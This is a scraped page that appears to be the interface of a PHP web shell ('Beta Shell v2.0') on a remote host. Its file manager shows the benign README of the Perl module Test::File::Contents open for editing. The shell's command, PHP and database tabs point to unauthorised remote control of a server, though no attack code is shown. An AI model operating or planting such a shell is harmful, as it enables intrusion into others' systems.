Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
share
/
doc
/
perl-Test-File-Contents
Upload
4 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
Changes
2.54 KB
-rw-r--r--
2016-03-16 17:08:51
Edit
Del
README
1.1 KB
-rw-r--r--
2016-03-16 17:08:51
Edit
Del
Editing: README
(1.1 KB)
Path: /usr/share/doc/perl-Test-File-Contents/README
Back
Test/File/Contents 0.23 ======================= This library's module, Test::File::Contents, provides an interface for testing file contents. Usage is quite simple: file_contents_eq $file, $contents, $description; file_contents_eq_or_diff $file, $string, $description; file_contents_like $file, qr/contents/, $description; file_md5_sum_is $file, $md5hash, $description; INSTALLATION To install this module, type the following: perl Build.PL ./Build ./Build test ./Build install Or, if you don't have Module::Build installed, type the following: perl Makefile.PL make make test make install Dependencies ------------ Test::File::Contents requires the following modules: * Perl 5.8.3 * Test::Builder * Digset::MD5 * File::Spec * Text::Diff Copyright and Licence --------------------- Copyright (c) 2004-2007 Kirrily Robert. Some Rights Reserved. Copyright (c) 2007-2016 David E. Wheeler. Some Rights Reserved. This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself.